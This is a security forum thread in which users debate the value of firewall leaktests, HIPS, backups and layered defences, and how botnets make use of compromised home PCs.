Firewall leaktests

Hi, All

If users [M$] did not run as Admins so often [default install], they would do very little harm to their systems with the test.

Take Care,
TheQuest

 

Hello ErikAlbert.

I am not saying that there is anything wrong with your concept of using backups and archives for protection. This is the most important, last line of defense. I just wanted to point out the still important usage of prevention applications along. The priority of security should be to prevent the malware to get into your PC in the first place, so that you don't have to use backups (too often). You use backup only when all else fails.



EDIT: well, I am using FDISR also.

 

I'm very aware of this. I never considered FDISR as a security software and mentioned this more than once at Wilders with an explanation why it wasn't. FDISR doesn't even know what malware is, but FDISR does something else, it undoes CHANGES and that means a total removal of bad (and good) changes. Scanners don't give me that guarantee, they only remove what is on their blacklist (+ heuristics) and that gives me only a grey computer.
I want a WHITE computer the next morning.

 

Hello Herbalist,

You are talking from a "real life / every day" use, in this context indeed no matter what application catches the leaktest or malware, as long as the malware is caught. You are already in the consequences, you use HIPS to catch suspicious or dangerous behaviors, which is what I advised. The point of the leaktests is precisely to lead you to this conclusion.

The leaktests were never meant to test your whole security setup, only the outbound protection from personal firewalls.

Again, this is the conclusion of the leaktests, a firewall alone cannot win against everything, you must use more layers. As I said above, the leaktests are to test with a context in mind, the context where (no matter the reason) all your other security layers were bypassed. Of course in your case, with HIPS + AV + Firewall + others, if the AV and the HIPS are bypassed, there is great chances that the firewall will be too (e.g : rootkit). However, people only running with a firewall alone are more in the scope of the test, and should more benefit from the conclusion that a firewall alone is not enought, and will (I hope) add more layers to their system.

You are not in this case, since you perfectly understand that a layered approach is safer

Of course, securing the Operating System itself is part of the layers, I have written a document about this point :
http://www.firewallleaktester.com/docs/Securing Windows.pdf

@ErikAlbert
Using backups is not a full security measure, for many reasons :
- if someday you are hacked, and then you restore a backup, you won't know how you were hacked, because of which software/vulnerability, and you are likely to be hacked again (the hole is not closed).
- if while the hack, a keylogger is installed, it may have the time to log passwords and to send them out, before you restore a backup.
- what if you got a MBR virus ? In this case, only a restore of your whole HDD (MBR + partitions) will erase it.

Imaging is mainly used in case of hardware failure. It is also used in security, for instance in cyber-cafe to restore the system at every boot, but in my opinion, it should be part of a layered security, and not being the sole security measure in place.

Anything persistent after the reboot will. However, something such as a vulnerability exploit in your browser will not necessarily do. A successfull exploit executing arbitrary code could execute shellcode from within your browser memory, read data on your HDD, and send them out. It all depends on what the shellcode does. It can of course download a malware and copy on the HDD as well.

I'm using backups myself, but not as a sole security defense.

Regards,
gkweb.

EDIT : you type faster than me :

You seems to already use it in a layered approach, which is good

 

gkweb,
I will consider your remarks anyway and I will use security softwares in my on-line snapshot to save the day.
I just have to find the right ones. Thanks for the usefull remarks.

 

Hello.

Again, a major point here - the learning curve. It's necessary to learn if you want to be protected.

 

For the purposes of testing and experimentation, disabling other software to see how the firewall alone handles a situation can be useful (e.g. to check that it is properly configured, to see the type of alert and the information it gives) and this was what the original poster seemed to be interested in. For more general testing though, your points are perfectly valid.

 

Hello,

The tests are meaningless because you know what you're doing.

HIPS are not very useful, because if you can answer every single prompt correctly - you don't need HIPS. If you can't, you'll shoot yourself one day in the foot and never know it.

Mrk

 

Hello Mrk,

I cannot agree with you, as it is a broad statement.
You assume that if we are skilled enought to understand perfectly all HIPS prompts and reply properly to every prompt, we are skilled enought to practice safe hex and to not do anything harmfull for our computer.

However, what happens on our computer is not only the result of what we intend to do, if I browse a "trusted" forum which has been compromised, it can download a trojan on my computer using an exploit in the forum, and execute it. Without an HIPS, I won't be prompted if I want to allow trojan.exe to run or not, despite the fact that I did nothing wrong.

If you are skilled enought to perfectly understand an HIPS and all of it's prompts, you are indeed less likely to be infected or hacked, but you still can be. While I agree that an HIPS is not useful at all to someone who click "YES" or "NO" randomly, it surely helps for the others and is a strong security layer.

Regards,
gkweb.

 

Hello,
Agreed. But ...
What are the chances of a trusted X or Y being compromised?
If you put IE / OE / other MS toys out of the game, what are the chances of any of those exploits actually working? Close to none, if not none.
Take any decent non-IE browser, go to the worst possible site you can think of, and it will be as silent as a bunch of lambs.
So HIPS may have a sense if you use MS toys. But if you exclude one simple vector from the equation, the game becomes boring. Furthermore, if you understand HIPS and their prompts, you will have configured your system just like HIPS - policies and such - that you do not need a third-party tool for that.
Mrk

 

Hello Mrk,

Thus you agree that technicaly without an HIPS you have less control and can be infected, that's what I said. I'm glad you confirm this point.

Then, we judge the issue differently. You think that this issue is less likely to happen and therefore, does not worth adding an HIPS. Whereas I think that on one hand, the chances to happen are greater than none (it happened in the past, I'll try to find you the link), and on the other hand, even if it was very less likely to happen, it is still possible, and therefore it justifies to protect us.

If an exploit is found against JavaScript it will work no matter your browser (if you have it enabled of course). Also 0-day exploit exists and are not a myth.
I perfectly agree with you that removing any "MS toys" such as IE/OE/MSN decreases dramatically the chances to be hit by an exploit. However, "chances" are what they are, unpredictable probabilities, and I do not base my security on uncertainty.

Our disagreement comes from our personal choice, from our conclusion after having analysed what we have to protect, it's value, and what are the chance for someone to steal them. I would say we agree on the facts, but not on the conclusion. I think everyone here have all the facts at hand and can choose either your way or mine, forums exists for this, there is not one unique absolute thruth

Regards,
gkweb.

 

Hello,

Of course I agree that extra monitoring means .... extra monitoring. I just find the person in control of the monitoring will make more mistakes than actual exploits ever happening.

When you mean JS vulnerability, you mean in the rendering software - like browser - not the code itself, of course. Sure, possible, but not likely given the robustness of non-IE products and the speed of patching. You're more likely to have your HDD die than get hit by exploit through JS in FF - just an example.

Most 0-day exploits are MSc thesis food.

Finally, you can make the game boring altogether by going for Linux.

Exploits exist, vulnerabilities exist, HIPS offer more information than none, but all combined, the benefit to anyone but real geeks is close to zero, because before the exploits happen, the user will make 30 other little mistakes along the way, including simple things like cleaning the dust with vacuum cleaner or spilling juice on the keyboard.

BTW, to put things in perspective, very few people have ever heard the word exploit let alone leaktest.

Mrk

 

I can't totally agree with that. If the term "firewall" is referring to both internet and application firewalls, whether they're combined or separate apps, then I can go along with it. Some of the leaktests specifically target the security software's ability to intercept hooks and prevent the exploiting of apps that have internet access, aka the application firewall or HIPS component. Others target Internet Explorer exclusively, and a simple blocking rule changes the test results completely. When the user is running a security or firewall suite, the whole package is effectively being tested, unless the user is going to disable all the features like the HIPS component and test just the internet firewall component. A test like PCAudit 6.3 comes to mind. Any decent HIPS, whether part of the firewall or separate can block the hook and defeat this test. Some users just don't realize that when the hook is blocked, the internet firewalls ability to control traffic doesn't get tested, and they'd do much better to allow the hook and use the test to tighten their firewalls loopback rules.

Unfortunately, leaktests are improperly used or outright abused far more than often than they're used properly. What burns me is seeing them used as advertising tools. Things like "Our Firewall suite with HIPS is superior to other firewalls because it passes more leaktests". I'd like to see a sticky thread at the top of the firewall section about how to properly use leaktests to tighten up a firewall instead of seeing them used to make scorecards for firewalls. Test results don't mean much when the user doesn't understand what the specific tests are doing, or why firewall "A" passes a given test but firewall "B" does not. Instead of setting up an effective layered security package, the result is a big pile of half configured security apps. Instead of leak testers, they should have been called configuration testers. They might have been misused a bit less.
Rick

 

I personally dont give a Rats Ass about Leaktests anymore It neither bothers me, nor will it, the sites I use that Need Secure login i.e such as Internet Banking Etc, are All Secured by VeriSign, and thats more than good enough for me, or Anyone really. If you sat and thought about All the Hoo Haa!, and other Bullshit about Data being leaked, then the Simple fact of the Matter is Nobody would use the Internet no More I've said this before,and I'll say it again, Hackers will pay no nevermind to the likes of you and me, Unless your in the Habit of Transfering Millions of Dollars a day, they really wont give us a Second Glance because really, what are they likely to gain Maybe a few MP3 files here and there, and Its a Sad Hacker who'll stoop to that Level of Boredom

 

Whoopee...the "Secured by Verisign" logo means that the site paid Verisign for an SSL certificate (which only serves as a check on their identity, not security) and extra advertising. It certainly offers nothing to protect against malware on your PC.

Any PC with a decent Internet connection is a target. Regardless of what data is stored on it, a hijacked PC can be used for the following:

• sending spam (most now comes from trojaned Windows PCs);
• DDoSing websites (which then have to pay blackmail money to avoid further attack);
• hosting websites (specifically the openly criminal or fraudulent ones like Impex Consult);
• installing adware, allowing the trojan controller to claim a commission;
• as a proxy, either providing a layer of anonymity for illegal purposes or issuing control instructions to other malware.

Firewalls with good leaktest performance have a better chance of being able to flag network connections made by these programs, allowing alert users to block them and take steps to clean their system. People who think they are beneath the notice of major criminal gangs because they have "nothing of value" are greatly mistaken - their system and connection is of value and will be exploited if unsecured.

 

Lol, I agree with you 100%, DVD+R. The leak tests are a joke. Well said.

 

Now thats just Bloody Ridiculous, What your saying is Little Billy who up untill now has done nothing more than play WarCraft on his pc is open to exploitation from what May I ask exactly?? Is someone going to Log into his computer and steal his WarCraft ID Or maybe they will discover some shadyness like he has pictures of Britany Speers on His Desktop Besides all that, to be an Alert User means you'll have to have Alarms & Stuff on your pc, or sit in front of it All Day Long, to which you need a life if you Do

 

1. You assume they know Little Billy
2. You assume it's only about credit cards, and don't read what Paranoid wrote
3. You assume someone has to be typing something to hack you
4. You assume a lot, and provide no reasoning.

Peter: If you layer, all the more reason to not need those features from a firewall, sure. Which was the first reason to make the leaktests, gkweb sai as much. But they do not make them a bad feature in a firewall, they make it better imo, all else being equal.
We're talking about dll injection, COM/OLE, parent process, etc. Not about an AV inside a FW searching for code, but detecting new things in an outbound connection in general.
If you have it covered, it's perfectly fine, no one is saying otherwise note.

 

Hello.

DVD+R, what about this statement:

and this:

 

Peter and DVD, P2K knows what he is talking about.

 

Keep in mind that a leak test is an executable, simulating what a trojan will do if installed on your system.

For most of us, we have to disable security in order to permit the leaktest.exe to run.

1) Doing this is admitting that something might get by your security. In that case, the leaktest is relevant.

2) If you are not concerned that something will breech your security, then the leaktest is not relevant.


regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."

--Bruce Schneier​

 

I have tricked little Billy into running a new 'WarCraft Trainer' which was in actuallity a new undetectable (by any AV out at the time) trojan which allowed me to have full access to every aspect of little Billy's PC. Not only did I steal his WarCraft credidentials (including his serial number), I grabbed his dad's credit card info. right before he used it to order some clothing (which was through a site using SSL and verified by VeriSign).

Ohh, and I did all this to show little Billy how a firewall such as Outpost or Comodo would have prevented this. If I was more computer savy and knew about a zero day exploit before it was patched, it would be very easy to do this to a great number of users without adequate protection on their PC... "Brittany Spears new sex video, free download".

 

There's nothing ridiculous about it. You're missing the point. Little Billy is not the target here. The PC is. Your PC has value to them, even if your data (or lack of it) doesn't. A fast PC on a high speed cable connection makes an effective weapon, especially when the user hasn't kept it up to date. Large numbers of PCs like little Billy's are what's used to launch DDOS attacks, like the one against Castle Cops. This isn't just theory. It's commonplace. PCs are not toys, even if its owner uses it as one.

No data of value to a hacker or botmaster on your PC? Think again!! How about your address book. Send some infected spam to everyone in the address book. One of little Billy's friends opens one, New Game secrets or nudie pics! Kids open these. Another bot is born, courtesy of the worthless data (a kids e-mail addy) supplied by your PC. Two of my more recent clients felt as you do, until I dug the trojans out of their "just for games" PCs.
Rick

 

Bots surge ahead in March
Published: 2007-03-22

The number of compromised computers that are part of a centrally controlled bot net has tripled in the past two weeks, according to data gathered by the Shadowserver Foundation, a bot-net takedown group.

http://www.securityfocus.com/brief/466

___________________________________________________


Published: 2007-03-23,
Last Updated: 2007-03-23 21:28:02 UTC
by John Bambenek

According to data by Shadowserver, the number of botnet-controlled machines has tripled in the last month. Specifically the jump seemed to start on March 8th or so and has kept going ever since. For the most part, they haven't tracked a significant increase in the number of botnets (only about a 20% jump), just the number of machines. The biggest C&C nets are near New York, Southern California, and near Germany. The biggest concentrations of botnet infected machines are in China, Brazil, and Argentina.

So it appears botnet controllers are getting better at increasing the size of their herds.


http://isc.sans.org/diary.html?storyid=2495